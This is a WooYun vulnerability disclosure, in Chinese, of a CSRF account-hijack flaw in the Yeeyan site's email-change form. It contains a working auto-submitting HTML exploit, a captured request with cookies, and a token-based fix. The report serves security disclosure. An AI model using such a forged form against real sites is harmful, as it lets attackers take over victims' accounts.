当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-015797

漏洞标题:译言网CSRF账户劫持漏洞

相关厂商:译言网

漏洞作者: stephen.lee

提交时间:2012-12-09 13:27

修复时间:2013-01-23 13:27

公开时间:2013-01-23 13:27

漏洞类型:CSRF

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-12-09: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-01-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

由于网页表单验证不严格,导致可以提交恶意用户信息,网站用户面板中有一个功能是更换用户邮箱,这个表单可以被恶意提交不属于当前用户的邮件地址。

详细说明:

<html>
<H2>CSRF Exploit to add </H2>
<body>

<form accept-charset="utf-8" method="POST" action="http://member.yeeyan.org/my/profile/email?" name="form0" enctype="multipart/form-data">
<input type="text" name="data[email]" value="[email protected]" />
</form>
<script type="text/javascript">
document.form0.submit();
</script>
</body>
</html>

漏洞证明:

提交伪造数据的header 信息。

Request URL:http://member.yeeyan.org/my/profile/email?
Request Method:POST
Status Code:200 OK
Request Headersview source
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Charset:UTF-8,*;q=0.5
Accept-Encoding:gzip,deflate,sdch
Accept-Language:zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
Cache-Control:max-age=0
Connection:keep-alive
Content-Length:157
Content-Type:multipart/form-data; boundary=----WebKitFormBoundaryUBhOCXRqb1cABfRZ
Cookie:PHPSESSID=f6568962a1aafdfbf5719fa5d3400910; CakeCookie[ykey]=368997; __utma=68569166.1733295180.1354628709.1354813506.1354995318.3; __utmb=68569166.11.10.1354995318; __utmc=68569166; __utmz=68569166.1354813506.2.2.utmcsr=baidu|utmccn=(organic)|utmcmd=organic|utmctr=%E8%AF%91%E8%A8%80
Host:member.yeeyan.org
Origin:http://member.yeeyan.org
Referer:http://member.yeeyan.org/my/profile/email
User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17
Request Payload
------WebKitFormBoundaryUBhOCXRqb1cABfRZ
Content-Disposition: form-data; name="data[email]"
[email protected]
------WebKitFormBoundaryUBhOCXRqb1cABfRZ--
Response Headersview source
Connection:keep-alive
Content-Encoding:gzip
Content-Type:text/html
Date:Sat, 08 Dec 2012 19:44:04 GMT
P3P:CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Server:nginx/0.8.47
Transfer-Encoding:chunked
Vary:Accept-Encoding
X-Powered-By:PHP/5.2.14

修复方案:

在表单中放置token,提交的时候从服务端验证。

版权声明:转载请注明来源 stephen.lee@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝